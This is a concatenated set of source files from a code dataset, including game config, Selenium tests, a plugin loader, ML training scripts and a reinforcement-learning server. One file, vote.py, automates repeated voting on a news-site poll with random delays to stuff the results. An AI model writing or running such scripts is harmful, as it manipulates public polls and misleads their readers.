"call"}, {"api_name": "PIL.ImageGrab", "line_number": 47, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 50, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 52, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 60, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 66, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 66, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 66, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 76, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 103, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 104, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 115, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 116, "usage_type": "call"}]} {"seq_id": "382821044", "text": "# snake parameters\r\nfrom pygame import K_p\r\n\r\nSNAKE_COLOR = (255,0,0)\r\nSNAKE_POS0 = (10,10)\r\n\r\nSNACK_COLOR = (0,255,0)\r\nSNAKETAIL_COLOR = (0,0,255)\r\n# to change the snake speed\r\nSNAKE_DT = 0.15# sleep in seconds\r\n# snake eyes color\r\nEYE_COLOR = (0,0,0)\r\n\r\n# grid numbers\r\nNROWS = 20\r\nNCOLS = 20\r\n# grid size\r\nGRID_DX = 25\r\nGRID_DY = 25\r\n# grid color\r\nGRID_COLOR = (255,255,255)\r\n\r\n# display\r\nDISPLAY_WIDTH = GRID_DX*NROWS\r\nDISPLAY_HEIGHT = GRID_DY*NCOLS\r\n# display background\r\nBACKGROUND_COLOR = (0,0,0)\r\n\r\n\r\n# pause 
key\r\nPAUSE_KEY = K_p", "sub_path": "snake_pygame/CONFIGS.py", "file_name": "CONFIGS.py", "file_ext": "py", "file_size_in_byte": 537, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.K_p", "line_number": 31, "usage_type": "name"}]} {"seq_id": "52090515", "text": "\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom Utilites.BaseClass import BaseClass\n\n\nclass testone(BaseClass):\n\n def test_End2End(self):\n products = self.driver.find_elements_by_css_selector(\"div[class='card h-100']\")\n for product in products:\n Productname = product.find_element_by_xpath(\"div/h4/a\").text\n if Productname == \"Blackberry\":\n product.find_element_by_xpath(\"div/button\").click()\n\n self.driver.find_element_by_class_name(\"btn-primary\").click()\n self.driver.find_element_by_class_name(\"btn-success\").click()\n\n self.driver.find_element_by_id(\"country\").send_keys('ind')\n\n wait = WebDriverWait(self.driver, 7)\n wait.until(EC.presence_of_element_located((By.LINK_TEXT, \"India\")))\n self.driver.find_element_by_link_text(\"India\").click()\n\n self.driver.find_element_by_xpath(\"//div[@class='checkbox checkbox-primary']\").click()\n self.driver.find_element_by_css_selector(\"input[type='submit']\").click()\n\n textmessage = self.driver.find_element_by_css_selector(\".alert-success\").text\n\n assert \"Success!\" in textmessage\n\n self.driver.get_screenshot_as_file(\"abhishek.png\")\n", "sub_path": "pythonProject/Frameworkdev/Tests/test_End2End.py", "file_name": "test_End2End.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "Utilites.BaseClass.BaseClass", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 25, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}]} {"seq_id": "74027879", "text": "from os.path import join, dirname, abspath\nfrom os import listdir\nimport importlib.util\n\nimport logging\n\nfrom uuid import uuid4\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass PluginManager(object):\n _plugins = {}\n _instance = None\n\n def __new__(clazz):\n if clazz._instance is None:\n clazz._instance = super(PluginManager, clazz).__new__(clazz)\n return clazz._instance\n\n def get_plugins(self):\n return self._plugins\n\n def get_user_plugins_dir(self):\n script_path = abspath(__file__)\n script_dir = dirname(script_path)\n return join(script_dir, \"user_plugins\")\n\n def load_plugins(self):\n logging.info(f\"Loading plugins...\")\n plugins_dir = self.get_user_plugins_dir()\n for file in listdir(plugins_dir):\n if file == \"__pycache__\":\n continue\n plugin_path = join(plugins_dir, file)\n module_name = f\"{file}\"\n logging.info(f\"\\tloading plugin {module_name} ({plugin_path})...\")\n spec = importlib.util.spec_from_file_location(\n 
f\"plugin_{module_name}\", plugin_path\n )\n plugin_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(plugin_module)\n plugin_uuid = uuid4()\n self._plugins[plugin_uuid] = plugin_module.Plugin(\n runtime_id=plugin_uuid, name=module_name\n )\n", "sub_path": "ingest/plugin_manager.py", "file_name": "plugin_manager.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 30, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 37, "usage_type": "call"}, {"api_name": "importlib.util.util.spec_from_file_location", "line_number": 38, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 38, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 38, "usage_type": "name"}, {"api_name": "importlib.util.util.module_from_spec", "line_number": 41, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 41, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 41, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 43, "usage_type": "call"}]} {"seq_id": "628674812", "text": "#-*- coding: utf-8 -*-\nfrom proteus import Model\nimport utils\nimport calles\n\ndef crear_inmueble(party):\n \"\"\"\n Crea un sigcoop_inmueble.inmueble asociado a party.\n\n Módulos que modifican inmueble:\n sigcoop_inmueble/inmueble.py\n\n Campos:\n calle_dom = fields.Char('Calle', required=True)\n numero_dom = fields.Char('Numero', required=True)\n cp_dom = fields.Char('CP', required=True)\n localidad_dom = fields.Char('Localidad', required=True)\n partido_dom = fields.Char('Partido', required=True)\n titulares = fields.Many2Many('sigcoop_inmueble.inmueble_titular','inmueble_id', 'titular_id', 'Titulares del inmueble')\n \"\"\"\n Inmueble = Model.get('sigcoop_inmueble.inmueble')\n inmueble = Inmueble()\n inmueble.calle_dom = utils.random_from_list(calles.calles)\n inmueble.numero_dom = 'nro'\n inmueble.cp_dom = 'cp'\n inmueble.localidad_dom = 'localidad'\n inmueble.partido_dom = 'partido'\n inmueble.titulares.append(party)\n inmueble.save()\n return inmueble\n", "sub_path": "scripts/inmueble.py", "file_name": "inmueble.py", "file_ext": "py", "file_size_in_byte": 1014, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "proteus.Model.get", "line_number": 21, "usage_type": "call"}, {"api_name": "proteus.Model", "line_number": 21, "usage_type": "name"}, {"api_name": "utils.random_from_list", "line_number": 23, "usage_type": "call"}, {"api_name": "calles.calles", "line_number": 23, "usage_type": "attribute"}]} {"seq_id": "126356014", "text": "import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ndef acci_type(acci,data):\n top=31\n my_acci=acci\n\n data.loc[len(data)] = [my_acci,'None']\n\n count_vector = 
CountVectorizer(ngram_range=(1,3))\n c_vector_title = count_vector.fit_transform(data['input'])\n\n title_c_sim = cosine_similarity(c_vector_title, c_vector_title).argsort()[:,::-1]\n\n target_type_index = data[data['input'] == my_acci].index.values\n\n sim_index = title_c_sim[target_type_index, :top].reshape(-1)\n sim_index = sim_index[sim_index != target_type_index]\n result = data.iloc[sim_index]\n best_type = result['output'].value_counts().head(3)\n \n top_3={}\n l=1\n for i in best_type.index:\n top_3[l]=i\n l+=1\n \n return top_3\n", "sub_path": "acci_type/type.py", "file_name": "type.py", "file_ext": "py", "file_size_in_byte": 916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 14, "usage_type": "call"}]} {"seq_id": "378777470", "text": "# coding: utf-8\n\nimport sys\nsys.path.append(\"/opt/tiger/test_ppo\")\n\nimport tensorflow as tf\nimport os\nimport logging\nfrom collections import OrderedDict\nimport glob\nimport argparse\nfrom multiprocessing import Queue, Process\nimport zmq\n\nfrom utils import unpack\n\nfrom zSAC.Worker_SAC import Worker_Q\nfrom zSAC.Trainer_SAC import Model\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\n\ndef clean(episodic, lifelong, data_dir, postfix):\n if lifelong is not None:\n if episodic >= lifelong:\n episodic -= lifelong\n sEPID = str(episodic)\n sEPID = (8 - len(sEPID)) * \"0\" + sEPID\n pattern = os.path.join(data_dir, sEPID + \"_*.\" + postfix)\n names = glob.glob(pattern)\n for name in names:\n if os.path.exists(name):\n try:\n os.remove(name)\n except FileNotFoundError:\n pass\n\n\ndef run(**kwargs):\n tmplimit = 512\n lifelong = None\n\n server_id = kwargs.get(\"server_id\", 0)\n\n address = \"ipc:///tmp/databack%d\" % server_id\n\n SCRIPT_DIR = kwargs.get(\"SCRIPT_DIR\")\n BASE_DIR = kwargs.get(\"BASE_DIR\")\n CKPT_DIR = kwargs.get(\"CKPT_DIR\")\n DATA_DIR = kwargs.get(\"DATA_DIR\")\n\n logging.basicConfig(\n filename=os.path.join(\n BASE_DIR, \"Serverlog\"),\n level=\"INFO\")\n\n frames = kwargs.get(\"frames\", 1)\n workers = kwargs.get(\"workers\", 16)\n parallel = kwargs.get(\"worker_parallel\", 4)\n MAX_STEPS = kwargs.get(\"max_steps\", 3200)\n seqlen = kwargs.get(\"seqlen\", 32)\n burn_in = kwargs.get(\"burn_in\", 32)\n alpha = kwargs.get(\"alpha\", 1.0)\n\n games = [\"SuperMarioBros-%d-%d-v0\" % (i, j) for i in range(1, 9) for j in range(1, 5)]\n\n config = tf.ConfigProto(\n allow_soft_placement=True,\n gpu_options=tf.GPUOptions(\n per_process_gpu_memory_fraction=0.025))\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n\n phs = dict()\n\n phs[\"s\"] = tf.placeholder(dtype=tf.float32, shape=[None, None, 84, 84, frames])\n phs[\"prev_a\"] = tf.placeholder(dtype=tf.int32, shape=[None, None])\n phs[\"state_in\"] = tf.placeholder(dtype=tf.float32, shape=[None, 128 * 4 * 2])\n phs[\"slots\"] = tf.placeholder(dtype=tf.float32, shape=[None, None])\n\n with tf.device(\"/gpu\"):\n with tf.variable_scope(\"p_lstm\", reuse=tf.AUTO_REUSE):\n plstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"q_lstm\", reuse=tf.AUTO_REUSE):\n qlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with 
tf.variable_scope(\"v_lstm\", reuse=tf.AUTO_REUSE):\n vlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n with tf.variable_scope(\"v_tar_lstm\", reuse=tf.AUTO_REUSE):\n vtarlstm = tf.compat.v1.keras.layers.LSTM(\n 128, return_sequences=True, return_state=True, name=\"lstm\")\n model = Model(7, plstm, qlstm, vlstm, vtarlstm, \"agent\", **phs)\n\n saver = tf.train.Saver(max_to_keep=None, keep_checkpoint_every_n_hours=6)\n\n # while True:\n # ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n # if ckpt is not None:\n # ckpt_path = ckpt.model_checkpoint_path\n # if ckpt_path is not None:\n # break\n # sleep_time = 10\n # logging.warning(\"No Model, Sleep %d seconds\" % sleep_time)\n # time.sleep(sleep_time)\n # saver.restore(sess, ckpt_path)\n\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n ckpt_path = None\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n sess.run(tf.global_variables_initializer())\n\n context = zmq.Context()\n frontend = context.socket(zmq.ROUTER)\n frontend.bind(address)\n\n queue_ins = OrderedDict()\n # queue_out = Queue(maxsize=3 * tmplimit)\n for i in range(workers):\n queue_in = Queue()\n worker_id = i\n queue_ins[worker_id] = queue_in\n\n worker = Process(\n target=Worker_Q,\n args=(queue_in,\n address,\n parallel,\n BASE_DIR,\n DATA_DIR,\n 3 * tmplimit,\n server_id,\n worker_id,\n \"\\t\".join(games),\n frames,\n seqlen,\n burn_in))\n worker.daemon = True\n worker.start()\n\n while True:\n ckpt = tf.train.get_checkpoint_state(CKPT_DIR)\n if ckpt is not None:\n new_ckpt_path = ckpt.model_checkpoint_path\n if new_ckpt_path != ckpt_path:\n ckpt_path = new_ckpt_path\n saver.restore(sess, ckpt_path)\n\n fd = {model.s_t: [],\n model.previous_actions: [],\n model.state_in: []}\n\n idx, msg = frontend.recv_multipart(copy=False)\n worker_id, databack = unpack(msg)\n s, a, state_in = databack\n fd[model.s_t] = s\n fd[model.previous_actions] = a\n fd[model.state_in] = state_in\n\n _a_t_new, _state_out_batch = sess.run(\n [model.get_current_act(),\n model.state_out],\n feed_dict=fd)\n\n dataforward = (_a_t_new,\n _state_out_batch)\n queue_ins[worker_id].put(dataforward)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-SCRIPT_DIR\", type=str,\n default=\"/opt/tiger/test_ppo\")\n parser.add_argument(\"-BASE_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2\")\n parser.add_argument(\"-CKPT_DIR\", type=str,\n default=\"/mnt/cephfs_new_wj/arnold/labcv/xiaochangnan\"\n \"/PPOcGAE_SuperMarioBros-v0/2/ckpt\")\n parser.add_argument(\"-DATA_DIR\", type=str,\n default=\"/mnt/mytmpfs\")\n parser.add_argument(\"-server_id\", type=int, default=0)\n parser.add_argument(\"-frames\", type=int, default=1)\n parser.add_argument(\"-workers\", type=int, default=4)\n parser.add_argument(\"-worker_parallel\", type=int, default=4)\n parser.add_argument(\"-max_steps\", type=int, default=3200)\n parser.add_argument(\"-seqlen\", type=int, default=32)\n parser.add_argument(\"-burn_in\", type=int, default=32)\n parser.add_argument(\"-alpha\", type=float, default=0.001)\n args = parser.parse_args()\n run(**args.__dict__)\n pass\n", "sub_path": "zSAC/Server_SAC.py", "file_name": "Server_SAC.py", "file_ext": "py", "file_size_in_byte": 6759, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.path.append", "line_number": 4, 
"usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.GPUOptions", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.device", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.keras.layers.LSTM", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 93, "usage_type": "attribute"}, {"api_name": "zSAC.Trainer_SAC.Model", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.train.get_checkpoint_state", "line_number": 
110, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 115, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 117, "usage_type": "call"}, {"api_name": "zmq.ROUTER", "line_number": 118, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 121, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 124, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 128, "usage_type": "call"}, {"api_name": "zSAC.Worker_SAC.Worker_Q", "line_number": 129, "usage_type": "name"}, {"api_name": "tensorflow.train.get_checkpoint_state", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.unpack", "line_number": 158, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 175, "usage_type": "call"}]} {"seq_id": "221024996", "text": "from selenium import webdriver\nimport time\nimport random\n\ntarget_url = 'http://news.hankyung.com/poll/10504'\n#target_url = 'http://news.hankyung.com/poll/10504'\n\ndef vote():\n browser = webdriver.Chrome(r'C:\\chromedriver\\chromedriver.exe')\n browser.get(target_url)\n time.sleep(1)\n input = browser.find_element_by_id('qu01')\n input.click()\n time.sleep(1)\n button = browser.find_element_by_class_name('vote-btn')\n button.click()\n time.sleep(1)\n browser.quit()\n\nif __name__ == '__main__':\n for i in range(10):\n vote()\n time.sleep(random.randrange(1, 10))", "sub_path": "crawler/vote.py", "file_name": "vote.py", "file_ext": "py", "file_size_in_byte": 597, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 14, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 23, "usage_type": "call"}]} {"seq_id": "536336000", "text": "#!/usr/bin/env python3\nimport os\nfrom setuptools import setup, find_packages\nfrom jsonrpc import version\n\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return \"\"\n\nsetup(\n name=\"json-rpc-3\",\n version=version,\n packages=find_packages(),\n test_suite=\"nose.collector\",\n tests_require=[\"nose\", \"mock\"],\n author='see AUTHORS',\n maintainer='Orhideous',\n maintainer_email='orhideous@gmail.com',\n url=\"https://github.com/Orhideous/json-rpc\",\n description=\"Pure Python 3 JSON-RPC 2.0 transport realisation\",\n long_description=read('README.rst'),\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.2\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords=[\"json\", \"rpc\", \"json-rpc\", \"transport\"],\n 
license=\"MIT\",\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 13, "usage_type": "call"}, {"api_name": "jsonrpc.version", "line_number": 15, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 16, "usage_type": "call"}]} {"seq_id": "435097387", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 27 19:26:42 2016\n\n@author: Tzyy Shyang\n\"\"\"\n\nimport pprint as pp\n\nimport pandas as pd\nimport numpy as np\n\nimport sklearn as sk\nimport sklearn.ensemble as sken\n\nimport coursera.ml_common.commonlib as cmn\n\n\"\"\"\nExploring Ensemble Methods\n==========================\n\nIn this homework we will explore the use of boosting. For this assignment, we will use the pre-implemented gradient boosted trees. You will:\n\n- Train a boosted ensemble of decision-trees (gradient boosted trees) on the lending club dataset.\n- Predict whether a loan will default along with prediction probabilities (on a validation set).\n- Evaluate the trained model and compare it with a baseline.\n- Find the most positive and negative loans using the learned model.\n- Explore how the number of trees influences classification performance.\n\n\"\"\"\n\n# Load the Lending Club dataset\n# =============================\n\n# We will be using a dataset from the LendingClub.\n\n# 1. Load the dataset into a data frame named loans.\nloans = pd.read_csv('../../data/lending-club-data.csv', index_col='id', dtype={'desc': object}, parse_dates=[47])\n\n# Exploring some features\n\n# 2. Let's quickly explore what the dataset looks like. First, print out the column names to see what features we have in this dataset. \n# Here, we should see that we have some feature columns that have to do with grade of the loan, annual income, home ownership status, etc.\nloans.columns.values\n\n# Modifying the target column\n# ===========================\n\n# The target column (label column) of the dataset that we are interested in is called bad_loans. In this column 1 means a risky (bad) loan 0 means a safe loan.\n\n# In order to make this more intuitive and consistent with the lectures, we reassign the target to be:\n\n# +1 as a safe loan\n# -1 as a risky (bad) loan\n\n# 3. We put this in a new column called safe_loans.\n# safe_loans = 1 => safe\n# safe_loans = -1 => risky\nloans['safe_loans'] = loans['bad_loans'].apply(lambda x: +1 if x==0 else -1)\nloans = loans.drop('bad_loans', 1)\n\n# Selecting features\n# ==================\n\n# In this assignment, we will be using a subset of features (categorical and numeric). The features we will be using are described in the code comments below. \n# If you are a finance geek, the LendingClub website (https://www.lendingclub.com/) has a lot more details about these features.\n\n# 4. The features we will be using are described in the code comments below. Extract these feature columns and target column from the dataset. 
\n# We will only use these features.\ntarget = 'safe_loans'\nfeatures = ['grade', # grade of the loan (categorical)\n 'sub_grade_num', # sub-grade of the loan as a number from 0 to 1\n 'short_emp', # one year or less of employment\n 'emp_length_num', # number of years of employment\n 'home_ownership', # home_ownership status: own, mortgage or rent\n 'dti', # debt to income ratio\n 'purpose', # the purpose of the loan\n 'payment_inc_ratio', # ratio of the monthly payment to income\n 'delinq_2yrs', # number of delinquencies\n 'delinq_2yrs_zero', # no delinquencies in last 2 years\n 'inq_last_6mths', # number of creditor inquiries in last 6 months\n 'last_delinq_none', # has borrower had a delinquency\n 'last_major_derog_none', # has borrower had 90 day or worse rating\n 'open_acc', # number of open credit accounts\n 'pub_rec', # number of derogatory public records\n 'pub_rec_zero', # no derogatory public records\n 'revol_util', # percent of available credit being used\n 'total_rec_late_fee', # total late fees received to date\n 'int_rate', # interest rate of the loan\n 'total_rec_int', # interest received to date\n 'annual_inc', # annual income of borrower\n 'funded_amnt', # amount committed to the loan\n 'funded_amnt_inv', # amount committed by investors for the loan\n 'installment', # monthly payment owed by the borrower\n ]\n\n# Skipping observations with missing values\n# =========================================\n\n# Recall from the lectures that one common approach to coping with missing values is to skip observations that contain missing values.\n# In Pandas, we'd run\nloans = loans[[target] + features].dropna()\n\n# Your tool may provide a function to skip observations with missing values. Consult appropriate manuals.\n\n# Fortunately, as you should find, there are not too many missing values. We are retaining most of the data.\n\n# Then follow these steps:\n\n# - Apply one-hot encoding to loans. Your tool may have a function for one-hot encoding. Alternatively, see #7 for implementation hints.\n# - Load the JSON files into the lists train_idx and validation_idx.\n# - Perform train/validation split using train_idx and validation_idx. In Pandas, for instance:\n\ncommonlib = cmn.MachineLearningCommonLib()\nencoded_loans = commonlib.one_hot_encoding(loans)\n\ntrain_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-train-idx.json')[0].values.tolist()\nvalidation_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-validation-idx.json')[0].values.tolist()\n\ntrain_data = encoded_loans.iloc[train_idx]\ntrain_target = train_data[target]\ntrain_data = train_data.drop(target, 1)\n\nvalidation_data = encoded_loans.iloc[validation_idx]\n\n# Gradient boosted tree classifier\n# ================================\n\n# Gradient boosted trees are a powerful variant of boosting methods; they have been used to win many Kaggle competitions, and have been widely used in industry. \n# We will explore the predictive power of multiple decision trees as opposed to a single decision tree.\n\n# Additional reading: If you are interested in gradient boosted trees, here is some additional reading material:\n\n# - GraphLab Create user guide (https://turi.com/learn/userguide/supervised-learning/boosted_trees_classifier.html)\n# - Advanced material on boosted trees (http://homes.cs.washington.edu/~tqchen/pdf/BoostedTree.pdf)\n\n# We will now train models to predict safe_loans using the features above. 
In this section, we will experiment with training an ensemble of 5 trees.\n\n# 9. Now, let's use the built-in scikit learn gradient boosting classifier (sklearn.ensemble.GradientBoostingClassifier) to create a gradient boosted \n# classifier on the training data. You will need to import sklearn, sklearn.ensemble, and numpy.\n\n# You will have to first convert the SFrame into a numpy data matrix. See the API for more information. You will also have to extract the label column. \n# Make sure to set max_depth=6 and n_estimators=5.\ngradient_boosting_classifier = sken.GradientBoostingClassifier(max_depth=6, n_estimators=5) \ngradient_boosting_classifier.fit(train_data, train_target)\n\n# Making predictions\n# ==================\n\n# Just like we did in previous sections, let us consider a few positive and negative examples from the validation set. We will do the following:\n\n# - Predict whether or not a loan is likely to default.\n# - Predict the probability with which the loan is likely to default.\n\n# 10. First, let's grab 2 positive examples and 2 negative examples. \n\nvalidation_safe_loans = validation_data[validation_data[target] == 1]\nvalidation_risky_loans = validation_data[validation_data[target] == -1]\n\nsample_validation_data_risky = validation_risky_loans[0:2]\nsample_validation_data_safe = validation_safe_loans[0:2]\n\nsample_validation_data = sample_validation_data_safe.append(sample_validation_data_risky)\nsample_validation_data = sample_validation_data.drop(target,1)\n\n# 11. For each row in the sample_validation_data, write code to make model_5 predict whether or not the loan is classified as a safe loan. \n# (Hint: if you are using scikit-learn, you can use the .predict() method)\n\nmodel_5 = gradient_boosting_classifier.predict(sample_validation_data)\n\n# Quiz question: What percentage of the predictions on sample_validation_data did model_5 get correct?\n# ans = 75%\n\n# Prediction Probabilities\n# ========================\n\n# 12. For each row in the sample_validation_data, what is the probability (according model_5) of a loan being classified as safe? \n# (Hint: if you are using scikit-learn, you can use the .predict_proba() method)\nmodel_5_prob = gradient_boosting_classifier.predict_proba(sample_validation_data)[:,1]\n\n# 